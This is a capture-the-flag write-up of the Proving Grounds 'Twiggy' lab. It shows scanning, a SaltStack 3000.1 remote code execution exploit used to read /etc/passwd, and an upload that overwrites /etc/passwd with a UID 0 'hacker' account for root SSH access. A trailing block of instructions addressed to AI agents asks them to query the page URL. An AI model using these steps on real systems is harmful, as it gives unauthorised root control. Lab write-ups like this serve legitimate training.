# Proving grounds Practice: Twiggy

Proving grounds Practice - Twiggy CTF writeup.

### Nmap

```sh
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0
8000/tcp open  http    nginx 1.16.1
```

### Web

#### PORT: 80

![img](/files/NtlJB8kX27yi00q9WkvQ)

#### PORT: 8000

![img](/files/TnOvsXHS0Bgf315WgW71)

The SaltStack Salt REST API is running.

![img](/files/BZxtxeqT1RkOBAHEJJc1)

SaltStack is vulnerable to [Saltstack 3000.1 - Remote Code Execution](https://www.exploit-db.com/exploits/48421)

### Exploitation

```sh
python exploit.py --master 192.168.174.62 --read /etc/passwd
```

![img](/files/YxRX5Db180WUpxuC0Nh5)

unable to obtain reverse shell using the `--exec` command in the exploit but we will be able to create and add our own new user account to the `/etc/passwd` file.

#### Create new user

```sh
openssl passwd hacked
$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1
```

`hacked` is the password.

Add the following to the `/etc/passwd` content we have extracted from the attacking machine.

```
hacker:$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1:0:0:root:/root:/bin/bash
```

**Writing /etc/passwd file**

```sh
python exploit.py --master 192.168.174.62 --upload-src passwd --upload-dest ../../../../../../../../../../etc/passwd
```

![img](/files/2xWRgyJkNVrsubkTY88k)

**Verify the user existence**

![img](/files/LwpWpaI2nkDSVGy1UBmb)

SSH to the attacking machine using the username as `hacker` and password `hacked`.

![img](/files/v7dwE5O15OGdaHDSz6LN)

**Root Obtained**

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-08-27-proving_grounds_practice-twiggy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.